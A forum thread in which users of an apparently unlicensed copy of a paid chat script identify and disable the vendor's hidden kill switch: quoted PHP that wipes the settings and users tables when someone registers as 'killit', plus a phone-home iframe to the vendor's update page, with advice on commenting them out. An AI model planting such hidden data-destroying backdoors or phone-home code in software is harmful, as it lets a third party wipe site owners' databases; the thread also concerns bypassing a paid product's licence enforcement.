12-13-2015, 08:00 AM
12-14-2015, 02:28 PM
anyone please help me out from this
This script is not free and illegal use of it is prohibited thanks to remove it from your server
This script is not free and illegal use of it is prohibited thanks to remove it from your server
12-14-2015, 03:31 PM
(12-14-2015 02:28 PM)blackwordwide Wrote: [ -> ]anyone please help me out from this
This script is not free and illegal use of it is prohibited thanks to remove it from your server
Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"
12-15-2015, 07:22 AM
(12-14-2015 03:31 PM)ozghelp Wrote: [ -> ](12-14-2015 02:28 PM)blackwordwide Wrote: [ -> ]anyone please help me out from this
This script is not free and illegal use of it is prohibited thanks to remove it from your server
Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"
thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(
12-15-2015, 08:31 AM
(12-15-2015 07:22 AM)blackwordwide Wrote: [ -> ](12-14-2015 03:31 PM)ozghelp Wrote: [ -> ](12-14-2015 02:28 PM)blackwordwide Wrote: [ -> ]anyone please help me out from this
This script is not free and illegal use of it is prohibited thanks to remove it from your server
Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"
thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(
If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:
Code:
//if($username == 'killit'){
//$mysqli->query("TRUNCATE TABLE setting");
//$mysqli->query("TRUNCATE TABLE users");
//}If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.
12-16-2015, 08:18 AM
great share bud thank's, max reps added
12-16-2015, 10:03 PM
(12-15-2015 08:31 AM)sup3rman Wrote: [ -> ](12-15-2015 07:22 AM)blackwordwide Wrote: [ -> ](12-14-2015 03:31 PM)ozghelp Wrote: [ -> ](12-14-2015 02:28 PM)blackwordwide Wrote: [ -> ]anyone please help me out from this
This script is not free and illegal use of it is prohibited thanks to remove it from your server
Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"
thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(
If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:
Code:
//if($username == 'killit'){
//$mysqli->query("TRUNCATE TABLE setting");
//$mysqli->query("TRUNCATE TABLE users");
//}
If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.
I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.
12-17-2015, 12:02 AM
(12-16-2015 10:03 PM)oliver108 Wrote: [ -> ](12-15-2015 08:31 AM)sup3rman Wrote: [ -> ](12-15-2015 07:22 AM)blackwordwide Wrote: [ -> ](12-14-2015 03:31 PM)ozghelp Wrote: [ -> ](12-14-2015 02:28 PM)blackwordwide Wrote: [ -> ]anyone please help me out from this
This script is not free and illegal use of it is prohibited thanks to remove it from your server
Quote:removing this from line 707 may work:
"<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>"
thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(
If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:
Code:
//if($username == 'killit'){
//$mysqli->query("TRUNCATE TABLE setting");
//$mysqli->query("TRUNCATE TABLE users");
//}
If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.
I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.
Yes didnt see that one. This backdoors are so irresponsible for a dev, I have googled for some of this script installation and you can wipe the db just registering with "killit" so stupid
12-17-2015, 12:42 AM
(12-17-2015 12:02 AM)sup3rman Wrote: [ -> ](12-16-2015 10:03 PM)oliver108 Wrote: [ -> ](12-15-2015 08:31 AM)sup3rman Wrote: [ -> ](12-15-2015 07:22 AM)blackwordwide Wrote: [ -> ](12-14-2015 03:31 PM)ozghelp Wrote: [ -> ]
thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(
If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:
Code:
//if($username == 'killit'){
//$mysqli->query("TRUNCATE TABLE setting");
//$mysqli->query("TRUNCATE TABLE users");
//}
If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.
I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.
Yes didnt see that one. This backdoors are so irresponsible for a dev, I have googled for some of this script installation and you can wipe the db just registering with "killit" so stupid
I looked through the code sequence, but I still don't now 2 things: how the "inventor" knows, who is using his script - probably somewhere is a hidden line what send him the domain adress, i don't now -, and the 2nd, how he rewrite the main room-s data (topic, log, etc.)
12-17-2015, 02:09 AM
(12-17-2015 12:42 AM)oliver108 Wrote: [ -> ](12-17-2015 12:02 AM)sup3rman Wrote: [ -> ](12-16-2015 10:03 PM)oliver108 Wrote: [ -> ](12-15-2015 08:31 AM)sup3rman Wrote: [ -> ](12-15-2015 07:22 AM)blackwordwide Wrote: [ -> ]thanks for your feedback, i already done remove that, but after any hours, the page got white blank screen... :(
If they have already your domain, they also have a backdoor on login.php, you should replace line 54 to 57 with this:
Code:
//if($username == 'killit'){
//$mysqli->query("TRUNCATE TABLE setting");
//$mysqli->query("TRUNCATE TABLE users");
//}
If updating remeber to remove line 764 from /system/admin_setting.php and also files from folder system in 7 to 7.1 update breaks the admin control.
I've found the same deleting in the system/user_status.php at the 31-32 lines.
I think its a good idea to inactivate it.
Yes didnt see that one. This backdoors are so irresponsible for a dev, I have googled for some of this script installation and you can wipe the db just registering with "killit" so stupid
I looked through the code sequence, but I still don't now 2 things: how the "inventor" knows, who is using his script - probably somewhere is a hidden line what send him the domain adress, i don't now -, and the 2nd, how he rewrite the main room-s data (topic, log, etc.)
I think the homecall is in the iframe in admin_settings.php:
Code:
<iframe id="update_iframe" src="http://www.myboomchat.com/update/index.php"></iframe>I dont remember but in v6.0 there was a comand for chaging the name of the main room, in v7 there is no such comand or I cant find it.